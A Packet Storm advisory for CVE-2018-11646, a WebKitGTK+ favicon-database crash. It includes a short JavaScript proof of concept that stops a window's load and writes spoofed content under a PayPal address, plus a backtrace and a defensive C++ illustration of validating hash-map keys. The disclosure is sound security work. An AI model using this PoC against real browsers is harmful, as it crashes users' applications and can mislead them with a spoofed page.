Packet Storm ID: PACKETSTORM:148053

WebKitGTK+ 2.21.3 pageURL Mishandling Denial Of Service

2018-06-05 00:00:00
Mishra Dhiraj
packetstormsecurity.com

EPSS score: 0.81 (High), percentile: 98.0%

`Summary:  
  
webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash. CVE-2018-11646 was assigned to this issue.  
  
PoC Author: @magicmac2000  
Found Issue in Webkit: Dhiraj Mishra (Team w00t)  
  
PoC:  
  
<script>  
win = window.open("sleep_one_second.php", "WIN");   
window.open("https://www.paypal.com", "WIN");   
win.document.execCommand('Stop');   
win.document.write("Spoofed URL");   
win.document.close();  
</script>  
  
  
Backtrace captured on Fedora 27 (webkitgtk4-2.18.0-2.fc27):  
  
#0 WTF::StringImpl::rawHash  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508  
#1 WTF::StringImpl::hasHash  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514  
#2 WTF::StringImpl::hash  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525  
#3 WTF::StringHash::hash  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73  
#9 WTF::HashMap, WTF::HashTraits >::get  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406  
#10 webkitFaviconDatabaseSetIconURLForPageURL  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193  
#11 webkitFaviconDatabaseSetIconForPageURL  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318  
#12 webkitWebViewSetIcon  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964  
#13 WTF::Function::performCallbackWithReturnValue  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108  
#15 WebKit::WebPageProxy::dataCallback  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083  
#16 WebKit::WebPageProxy::finishedLoadingIcon  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848  
#17 IPC::callMemberFunctionImpl::operator()  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68  
#29 WTF::RunLoop::::_FUN(gpointer)  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70  
#30 g_main_dispatch  
at gmain.c line 3148  
#31 g_main_context_dispatch  
at gmain.c line 3813  
#32 g_main_context_iterate  
at gmain.c line 3886  
#33 g_main_context_iteration  
at gmain.c line 3947  
#34 g_application_run  
at gapplication.c line 2401  
#35 main  
at ../src/ephy-main.c line 432   
  
  
References:  
  
https://bugs.webkit.org/show_bug.cgi?id=186164  
https://bugzilla.gnome.org/show_bug.cgi?id=795740   
`
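The summary and backtrace above describe one failure class: a WTF::String that was never set carries a null StringImpl pointer, and using it as a HashMap key dereferences that null pointer inside the hash routine (the rawHash frame at the top of the trace). The following is an added illustration written for this page; it is not WebKit's code and not the upstream patch. The class names (StringImpl, String, StringHash, FaviconDatabase) only mimic WebKit's, the FNV-1a hash is a stand-in, and the isEmpty() guard in the setter is an assumed mitigation shape, not the fix that landed for the referenced bug reports.

```cpp
// Added illustration of the crash class described in the advisory above; not
// WebKit's code. A null String holds a null StringImpl pointer, so hashing it as
// a map key dereferences null. The guarded setter rejects such keys before the
// lookup. Class names mimic WebKit's; the guard is an assumed mitigation shape.
#include <cstddef>
#include <cstdint>
#include <memory>
#include <optional>
#include <string>
#include <unordered_map>
#include <utility>

// Stand-in for WTF::StringImpl: character storage plus a lazily cached hash.
struct StringImpl {
    explicit StringImpl(std::string s) : chars(std::move(s)) {}
    std::string chars;
    uint32_t cachedHash = 0;

    // FNV-1a for illustration; WebKit's actual hash algorithm is irrelevant here.
    uint32_t hash() {
        if (cachedHash == 0) {
            uint32_t h = 2166136261u;
            for (unsigned char c : chars) { h ^= c; h *= 16777619u; }
            cachedHash = h ? h : 1;  // keep 0 reserved for "not yet computed"
        }
        return cachedHash;
    }
};

// Stand-in for WTF::String: a nullable handle. A default-constructed String is
// "null" (no impl), which is what an unset page URL looks like to the database.
class String {
public:
    String() = default;
    explicit String(const char* s) : m_impl(std::make_shared<StringImpl>(std::string(s))) {}
    bool isNull() const { return !m_impl; }
    bool isEmpty() const { return isNull() || m_impl->chars.empty(); }
    const std::string& str() const { return m_impl->chars; }  // caller ensures non-null
    // Same shape as the crashing path: String::hash() -> StringImpl::hash().
    // On a null String this dereferences a null pointer.
    uint32_t hash() const { return m_impl->hash(); }
    bool operator==(const String& o) const {
        if (isNull() || o.isNull()) return isNull() && o.isNull();
        return m_impl->chars == o.m_impl->chars;
    }
private:
    std::shared_ptr<StringImpl> m_impl;
};

struct StringHash {
    size_t operator()(const String& s) const { return s.hash(); }
};

// Stand-in for the favicon database's page URL -> icon URL map.
class FaviconDatabase {
public:
    // Unguarded variant: the map access hashes pageURL unconditionally, so a null
    // pageURL crashes inside hash(). This is the pattern the advisory describes.
    void setIconURLForPageURLUnguarded(const String& iconURL, const String& pageURL) {
        m_pageURLToIconURL[pageURL] = iconURL;
    }

    // Guarded variant: validate the key before it can reach the hash map and
    // report the rejection instead of crashing the UI process.
    bool setIconURLForPageURL(const String& iconURL, const String& pageURL) {
        if (pageURL.isEmpty() || iconURL.isEmpty())
            return false;
        m_pageURLToIconURL[pageURL] = iconURL;
        return true;
    }

    std::optional<std::string> iconURLForPageURL(const String& pageURL) const {
        if (pageURL.isEmpty())
            return std::nullopt;
        auto it = m_pageURLToIconURL.find(pageURL);
        if (it == m_pageURLToIconURL.end())
            return std::nullopt;
        return it->second.str();
    }

    size_t size() const { return m_pageURLToIconURL.size(); }

private:
    std::unordered_map<String, String, StringHash> m_pageURLToIconURL;
};

// Constructed scenario: an unset page URL (default String) followed by a valid one.
// Returns {nullKeyRejected, storedEntries}; expected {true, 1}.
std::pair<bool, size_t> storeUnsetThenValidPageURL() {
    FaviconDatabase db;
    const String icon("https://example.test/favicon.ico");  // constructed sample values
    bool rejected = !db.setIconURLForPageURL(icon, String());
    db.setIconURLForPageURL(icon, String("https://example.test/"));
    return {rejected, db.size()};
}

int main() {
    auto result = storeUnsetThenValidPageURL();
    return (result.first && result.second == 1) ? 0 : 1;
}
```

The point of the guard is where it sits: the check happens in the API entry point, before the key is handed to any container, so a caller that never set a page URL gets a false return instead of taking down the whole UI process. A crash in UIProcess code is worth more attention than a crash in a sandboxed content process, because it is the one process the user's other tabs depend on.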